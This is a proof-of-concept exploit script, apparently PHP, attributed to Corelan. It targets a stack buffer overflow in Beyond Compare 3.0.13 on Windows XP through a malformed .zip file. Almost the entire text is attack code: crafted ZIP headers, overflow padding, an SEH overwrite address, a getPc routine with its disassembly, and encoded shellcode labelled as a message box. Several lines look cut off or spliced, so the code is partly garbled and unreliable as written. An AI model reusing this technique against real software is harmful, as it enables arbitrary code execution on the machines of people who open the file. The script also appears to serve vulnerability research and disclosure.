Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://es.kioskea.net/remote/download_get.php?ID=2321
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-036
Patched in latest version and previous versions
Greetz to: Corelan Security Team
Thanks to rick2600 and corelanc0d3r for the getPc !
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
echo "
| __ __|
| _________________/ /___ _____ / /________ _____ ___|
|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|
| http://www.corelan.be:8800 |
|security@corelan.be |
|-------------------------------------------------[ EIP Hunters ]--|
~~> Beyond compare 3.0.13 b9599 (.zip) BOF PoC exploit <~~
// local file header
$lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE".
// central directory file header
$cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7".
// end of central directory record
$efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
// corelan security team - msgbox
$sc = "VYhffffk4diFkDql02Dqm0D1CuEE5n3l0G3j3C0S1p02024B0W3y2G2u4D0k4q3c".
Corelan's - getPc routine
0424F020 EB 05JMP SHORT 0424F027
0424F022 5E POP ESI
0424F023 41 INC ECX
0424F024 FFD6 CALL ESI
0424F026 41 INC ECX
0424F027 E8 F6FFFFFFCALL 0424F022
// ascii armoured & mangled
$getPc = "\x89\x05\x5e\x41\x98\x99\x41\x8a\x94\x98\x98\x98";
$sEh = "\x0d\x05\x01\x10"; // add esp, 8; retn --> 7zxa.dll
$trigger = "\x3a";
// build the PoC
$junk = str_repeat("\x41", 2064)."\x2e\x74\x78\x74";
$lol = str_repeat("\x41", 223)."\x41\x73\x06\x41".$sEh.$getPc.$sc;
$lol .= str_repeat("\x41",2062-strlen($lol)).$trigger."\x2e\x74\x78\x74";
$_____boooom = $lf_header.$junk.$cdf_header.$lol.$efcdr_record;